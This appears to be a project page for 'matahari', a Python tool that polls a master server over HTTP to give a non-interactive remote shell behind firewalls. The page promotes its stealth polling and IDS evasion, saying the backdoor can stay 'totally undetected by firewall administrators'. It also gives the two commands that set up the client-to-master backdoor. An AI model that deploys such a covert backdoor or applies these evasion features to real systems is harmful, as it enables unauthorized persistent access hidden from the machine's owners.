Latest stable version: 0.1.30 - Please upgrade!
Introduction and motivation
matahari is a python script designed to provide a basic non-interactive shell on remote systems behind firewalls. It is intended for use by system administrators who may need some emergency backdoor to access a firewalled machine.
Once you set up the script on the target machine (namely, the client) it begins trying to retrieve commands from the master machine (the server). The time between periodic requests (polls) can be configured to suit different needs ranging from low latency (frequent polls) to stealthier behaviours.
All traffic between target and master machine is made through HTTP GET/POST requests and their corresponding responses, traversing firewall as standard outgoing web traffic. Optional IDS-evasion techniques can be used in special scenarios where backdoor should remain totally undetected by firewall administrators.
Although matahari is in early development status (thus you should be forgiving with her ;), current version offers this features:
- Non-interactive commands full support
- Several polling types to suit different needs
- Rough calculation of estimated time for next command execution
- Payload encryption support using ARC4 algorithm (requires python-crypto package), salting passwords to avoid retransmission attacks
- Basic HTTP proxy support
- Random polling times for ids-evasion
- Support for admin commands to modify remotely the initially configured polling type
Suppose you have a target machine (target.foo.com) behind a firewall and you want to be able to execute commands from a master machine (master.bar.com). The scenario could be set up as follows:
- Exec on target machine:
./matahari.py -c master.bar.com -T polite.
Be sure to keep process running even after logging off (nohup and screen are your friends)
- Exec anytime on master machine:
./matahari.py -s target.foo.com